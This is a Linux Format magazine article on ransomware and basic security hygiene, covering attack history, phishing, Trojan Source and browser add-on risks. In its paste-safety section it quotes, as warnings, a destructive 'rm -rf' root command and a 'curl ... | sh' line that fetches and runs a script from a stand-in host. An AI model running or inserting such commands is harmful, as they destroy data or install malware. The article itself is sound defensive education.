Combat Malware!
Linux Format|February 2022
Jonni Bidwell wants to turn the tide on ransomware in 2022. It appears he has his work cut out for him…
By Jonni Bidwell

These days we’re never far from cybercrime-themed headlines. What was very much in the realms of sci-fi a couple of decades ago has become almost commonplace today.

In the past few years we’ve seen largescale attacks against Ukraine’s power grid, Sony Pictures, the Colonial Oil Pipeline, JBL-SA( the world’s largest meat supplier) and South African shipping firm Transnet. Such attacks often aim to cause damage and disruption (the power grid attack left hundreds of thousands without power for hours). And sometimes the aim is political. For example, the Sony Pictures hack is widely believed to have originated from North Korea, with hackers demanding The Interview (a Kim Jong Un-themed comedy) be withdrawn. Which it was, although not before gigabytes of embarrassing emails and personal information on Sony Pictures staff was shared.

Latterly though, hackers are financially motivated. They want their targets to pay (usually in cryptocurrency), either to restore access to their systems, or to avoid sensitive information being publicised. The last three attacks mentioned above all occurred in 2021, and are examples of such ransomware attacks. Ransom demands can be high too: the Colonial Pipeline hackers received $10 million (most of which was recovered), and prolific (but now defunct) ransomware outfit REvil requested $70 million following a supply chain attack on managed software company Kaseya. Thanks to the ease with which fiat currency could be exchanged for Bitcoin, ransomware attacks launched against home users have proven profitable, too.

The tired old line “Linux doesn’t get viruses” (or ransomware, or whatever other kind of badware you might care to name) was never really true. Internetfacing Linux servers have long been a target for all kinds of mischief, and with so many Linux-powered Internet of Things devices joining the party, such intrusions are only going to increase.

Directed attacks against home users are waning, primarily because there are much more lucrative targets out there, but that’s no excuse for complacency. We’ll show you the modern threatscape, refresh some best practices and hopefully get your 2022 off to the safest start possible. So let’s get to it!

Ransomware’s evolving

It’s bad and it’s getting worse. But running outdated versions of Windows doesn’t help anyone.

A few years back guilt-ware attacks were common. Unsuspecting users would log into their machines and be greeted with a banner stating they were under investigation for nebulous crimes. Anything from to piracy, to pornography or promulgation of terror materials. But don’t worry, says the warning – all of this will go away if you just wire some cryptocoins to this address.

The message goes on to explain how to acquire said coins, and warns that if you don’t pay, you’ll be arrested. That these kinds of attacks were ever successful (and sometimes still are) speaks volumes about people’s gullibility. It also shows some people have some quite funky ideas about how justice works. Yet we shouldn’t be so dismissive – there’s some psychology behind this.

There’s a widely held theory that everyone has some latent guilt about something they’ve done in the past and not ‘fessed up to. And tapping into this with a scary message can make the subject feel rumbled. Detectives take advantage of this (and all kinds of other techniques) when questioning suspects.

Still, it’s the kind of message that lots of people (especially anyone used to browsing the internet without a pop-up blocker), will just close and ignore. So later evolutions of this attack would go a stage further, either locking the victim out of the machine entirely (forcing the user to choose between a complete reinstall or a quick ransom payment) or encrypting any user documents it finds. This is what ransomware typically refers to today. Thanks to networking (and a rich underground scene in the trade of network exploits) damage may quickly spread to other machines too, and before you know it a stray click on a single machine might bring about a network-wide incident.

Naturally, businesses are a much more lucrative target with (according to Coveware) the average payout in 2020 being $233,817. Attacks on home users might ask for anywhere between the equivalent of $200 to $2,000, which is why they don’t tend to grab the headlines anymore. Home users may also feel uncomfortable about reporting a ransomware attack, but they shouldn’t. Even if the authorities can’t help, reporting the incident (to the likes of CISA in the US or the NCA in the UK) will at least help them measure the scale of the threat. For businesses, the projected cost of recovery might well exceed the ransom, at which point it makes business sense to cough up. Insurers are starting to recognise this now and some (controversially) even include ransomware payments in their policies.

HOW TO BECOME INFECTED

Unfortunately, most if not all ransomware outbreaks start with human error. This might be through social engineering, spear phishing campaigns (where high-profile individuals are targeted and tricked into handing over data with seemingly legitimate messages), rogue browser add-ons, dodgy websites, dodgy mobile apps, poisoned email attachments… the list goes on.

Sometimes human error upstream is to blame. For example, SIM-swapping attacks might involve tricking a customer service agent to porting a number to another SIM. This might then enable 2FA to be compromised on all of the accounts linked to that number. Whatever the method, once a human has erred, there’s not a lot even the most secure(-est) system in the world can do remedy things

The WannaCry outbreak in 2017, which nearly crippled the UK’s largely Windows 7-powered NHS, was a little different, since its spread was mostly as a result of a vulnerability in the SMB protocol. That vulnerability was actually known to NSA researchers, who named it EternalBlue. Unfortunately someone (perhaps a rogue contractor) made away with its details. And later, just before WannaCry hit, the vulnerability was published by a group calling themselves the ShadowBrokers. EternalBlue, which enables privileged code execution on remote systems, was also leveraged in the NotPetya ransomware outbreak, which disrupted global shipping.

Safe hex

Taking a few basic precautions is much easier than cleaning up a nasty digital infection

Basic internet hygiene is the single best defence for home users against ransomware, and malware in general. Unfortunately “the basics” encompasses many different areas these days that deserve their own cover features. Still, let’s at least try and summarise them here.

We hope you’re not the sort of person to click random links in suspect-looking emails, at the very least one should hover over them (or copy and paste the link into a text document) to make sure it links to a legitimate domain (and not something using deceptive characters like goog1e.com, or deceptive subdomains like google.domain.cm). Speaking of copying and pasting, be extra careful when doing so with code excerpts. Not only is there the risk the command itself will do something bad, like rm -rf –no-root-preserve /, but thanks to the wonders of CSS and Unicode it’s easy to inject invisible characters that you won’t see until they’re pasted (and conceivably not even then). Just appending ; curl ransomware.xyz/pwn.sh | sh is one way to stop a benign command being so benign. Not a real URL, by the way. Bidirectional (Bidi) character encodings have been used to obfuscate file extensions of email-borne malware in the past.

Passing on the compromise

And now a more insidious form of this attack has been discovered, dubbed Trojan Source. It turns out that most compilers, while supporting and encouraging Unicode source files, don’t really have any mitigations against obfuscated Bidi additions. So a lazy developer might copy and paste a code snippet from Stack Overflow, then not only risk having their own compiler exploited, but if they then upload that code to a popular project, the whole well becomes poisoned. You can read about it at https://krebsonsecurity.com/2021/11/trojan-sourcebug-threatens-the-security-of-all-code. The scope of the attack is huge, because it enables essentially arbitrary, invisible code to be added. This might be keyloggers, ransomware or any number of other bad things.

No matter how web-savvy you are, you can always take steps to boost your browsing security. No one likes ads, and no one likes that the networks behind them are on occasion compromised to instead spew malicious JavaScript. The most popular ad-blocker for Firefox is uBlock Origin, and we heartily recommend it.

There are a number of other add-ons you might want to use to protect privacy. But be aware that the Firefox add-ons repository and Chrome Web Store aren’t monitored for malicious code. So exercise caution when downloading new add-ons. Even genuine add-ons contain code that can be exploited, either by a rogue add-on or a maliciously crafted web page. A study entitled DoubleX: Statically Detecting Vulnerable Data Flows in Browser Extensions at Scale found 184 extensions that could be exploited this way. An unchecked eval function in a privileged extension might allow a web page to do anything that extension can. A likewise stray tabs. execute() call would allow remote code inclusion.

Continue reading your story on the app

Continue reading your story in the magazine

MORE STORIES FROM LINUX FORMATView All

Bluehost Web Hosting

Feature-packed hosting geared towards WordPress, discovers Mike Williams.

2 mins read
Linux Format
May 2022

Build a Python-based reaction game

Les Pounder goes back to the early days of the Raspberry Pi to look at a board that made a big difference to his career.

6 mins read
Linux Format
June 2022

BULLET-PROOF UBUNTU 22.04

Walpurgis Night is nearly upon us, so cast aside your old OS and begin life anew with Ubuntu 22.04

10+ mins read
Linux Format
June 2022

Armbian 22.02 Jammy XFCE

Les Pounder takes a look at a distro that supports 64 different Linux single board computers, and now he has to buy them all.

3 mins read
Linux Format
June 2022

ALL HANDS ON DECK

Jonni Bidwell pries Valve's Steam Deck from PC Gamer's cold, anthropomorphised hands and gets his game on.

10+ mins read
Linux Format
June 2022

Arducam Auto-focus 16MP Camera module

Quick-off-the-draw Les Pounder can't shoot shots faster than this camera.

3 mins read
Linux Format
June 2022

The Last Cube

Management isn't keen on sentient anything, it's bad for productivity, so Neil Mohr keeps the thinking to a minimum which isn't helping here at all...

3 mins read
Linux Format
June 2022

Ubuntu 22.04 LTS

If there's one thing Mayank Sharma likes even less than Ubuntu, it's Ubuntu LTS releases, which are notably stable but not notable generally.

6 mins read
Linux Format
June 2022

HostGator

A basic website hosing option for small and medium businesses that Shashank Sharma thinks should be on your short list.

3 mins read
Linux Format
June 2022

Linux Mint DE 5

Whenever there's a new LMDE release, Mayank Sharma can't help but think of the old adage: "It's the thought that counts.”

3 mins read
Linux Format
June 2022
RELATED STORIES

THE BEST FREE SOFTWARE FOR YOUR PC

START OFF RIGHT WITH SOLID SECURITY TOOLS, PRODUCTIVITY SOFTWARE, AND OTHER PROGRAMS THAT EVERY PC NEEDS.

10+ mins read
PCWorld
February 2022

Covid-19 Provides Cover for Hackers

The travails of a banking software maker show how vulnerable corporate security is

5 mins read
Bloomberg Businessweek
April 13, 2020

Microsoft Ends Free Windows 7 Security Updates

If you’re still using Microsoft’s Windows 7, your computer might soon be at risk.

1 min read
Techlife News
January 18, 2020

With The App Defense Alliance, Google Play Protect Might Actually Keep Malware Off Your Phone

Google has announced a new alliance to augment its inadequate Play Protect malware-detection system.

2 mins read
PCWorld
December 2019

Welcome To The Hacker Hotel!

Back doors to your personal data can be found all over hotel rooms, from the smart TV to the remote control drapes.

9 mins read
Bloomberg Businessweek
July 01, 2019

Sophisticated Surveillance Malware Spotted On Android And iOS Phones

Most of the malware targeting phones is the product of a handful of disaffected people looking to make a quick buck.

2 mins read
PC Magazine
May 2019

British Cyber Expert Pleads Guilty To Creating Malware

A British cybersecurity researcher credited with stopping a worldwide computer virus has pleaded guilty to developing malware to steal banking information.

2 mins read
AppleMagazine
AppleMagazine #391

Asus Computers Infected By Auto-update Virus

In a sophisticated targeted espionage operation, hackers infected tens of thousands of computers from the Taiwanese vendor ASUS with malicious software using the company’s online automatic update service, security researchers reported this week.

1 min read
AppleMagazine
March 29, 2019

That Russia Router Malware Threat Might Be Worse Than Feared!

In some cases, a full factory reset may be required.

5 mins read
Macworld
August 2018

The Pegasus Plot Thickens

The government staunchly denies allegations of having used foreign malware to snoop on private indian citizens. But the controversy has raised major concerns about violations of individual privacy and effective checks to prevent misuse of state power

8 mins read
India Today
August 02, 2021